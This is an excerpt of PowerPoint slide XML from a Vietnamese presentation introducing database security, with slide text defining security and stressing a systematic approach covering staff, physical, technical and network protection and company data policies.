                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="32561" y="134634"/>
              <a:ext cx="1987197" cy="1511364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="457200" indent="-457200" algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Trong quá trình phát triển phần mềm, bảo mật thường được coi là một yếu tố phụ và ít khi được ưu tiên hàng đầu</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600">
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200" algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Tuy </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>nhiên, việc xử lý lỗ hổng bảo mật mà không có kế hoạch </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>cụ thể</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3600">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200" algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>L</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>ỗ hổng bảo mật có thể phụ thuộc vào cách mà hệ thống được triển khai</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10104444"/>
            <a:ext cx="18288000" cy="182556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F24300"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="808910"/>
            <a:ext cx="15544799" cy="788677"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>I. Giới thiệu về cách tiếp cận bảo mật cơ sở dữ liệu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E3E3EC2-8CA6-4298-5DAB-9A66446C16D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11550625" y="1597587"/>
            <a:ext cx="6737375" cy="6737347"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="6349974"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DA84286-A2E0-E852-62DB-F567418A461F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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2"/>
              <a:stretch>
                <a:fillRect l="-25046" r="-25046"/>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latin typeface="Crimson Pro"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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down)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="22" presetClass="entr" presetSubtype="4" fill="hold"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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="16"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CFD9F0-5190-B337-7614-7159E0C22BCD}"/>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9F2120E1-6349-7BB6-B88A-C26BA8863D0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-8376890">
            <a:off x="-4899893" y="6122938"/>
            <a:ext cx="11422613" cy="8328123"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11422613" h="8328123">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11422613" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11422613" y="8328124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="832812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1" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{032DCE1D-D5FA-D169-51BE-72B3E7230914}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760920" y="876300"/>
            <a:ext cx="15544799" cy="1647887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEB5D926-B3F4-E59B-A547-6D06FC315D41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="742951" y="2698265"/>
            <a:ext cx="16802100" cy="6712434"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03E7B162-095C-CB4D-04A7-F9BB91FD8AE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="71151"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ADD7DFA-3EDE-E7F4-E401-EF52FADD973E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="172424"/>
              <a:ext cx="1554027" cy="405219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="vi-VN" sz="3200" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>2.1 Bảo mật</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Malgun Gothic" panose="020B0503020000020004" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D2A80CE-B053-D19C-EB1A-846560B6C626}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3463694"/>
            <a:ext cx="12266762" cy="5139869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Khái niệm: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bảo mật là quá trình hoặc tập hợp các biện pháp được thiết kế để bảo vệ thông tin quan trọng, hệ thống máy tính, dữ liệu, tài nguyên và các hoạt động trực tuyến khỏi các mối đe dọa, nguy cơ và rủi ro. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Mục tiêu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" u="sng">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>đảm bảo tính toàn vẹn, sẵn sàng và bảo mật của thông tin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Đồng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>thời ngăn chặn các cuộc tấn công, truy cập trái phép và sử dụng sai mục đích. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2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Khi xem xét</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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vi-VN" sz="2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bảo mật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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dữ liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2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nó đòi hỏi một cách tiếp cận có hệ thống phải bao gồm: nhân viên, bảo mật vật lý và kỹ thuật, an ninh mạng (LAN và / hoặc WAN)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2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Đây là một cách tiếp cận rất chung về bảo mật, vì hầu hết mọi người đều xử lý các vấn đề bảo mật liên quan đến cấu hình tường lửa. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="280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p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2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Tuy nhiên, để bảo vệ dữ liệu và tránh các: mối nguy vật lý, lỗi phần cứng, lỗi phần mềm,… Mọi công ty đều phải có chính sách bảo mật dữ liệu. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83F824C0-316B-666E-9A51-67ACA35CD1C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="1616801">
            <a:off x="14945504" y="2056594"/>
            <a:ext cx="2860223" cy="3271303"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="6349975"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F897986-A056-9F93-7437-8A32F20D0844}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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4"/>
              <a:stretch>
                <a:fillRect l="-49999"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347006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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>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39"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="with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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="1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1" grpId="0"/>
      <p:bldP spid="3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C913AE-2504-DD2E-BCA7-64B398446A32}"/>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DEE98774-BC3C-B866-F631-F022F1295D00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-8376890">
            <a:off x="-4899893" y="6122938"/>
            <a:ext cx="11422613" cy="8328123"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11422613" h="8328123">
                <a:moveTo>
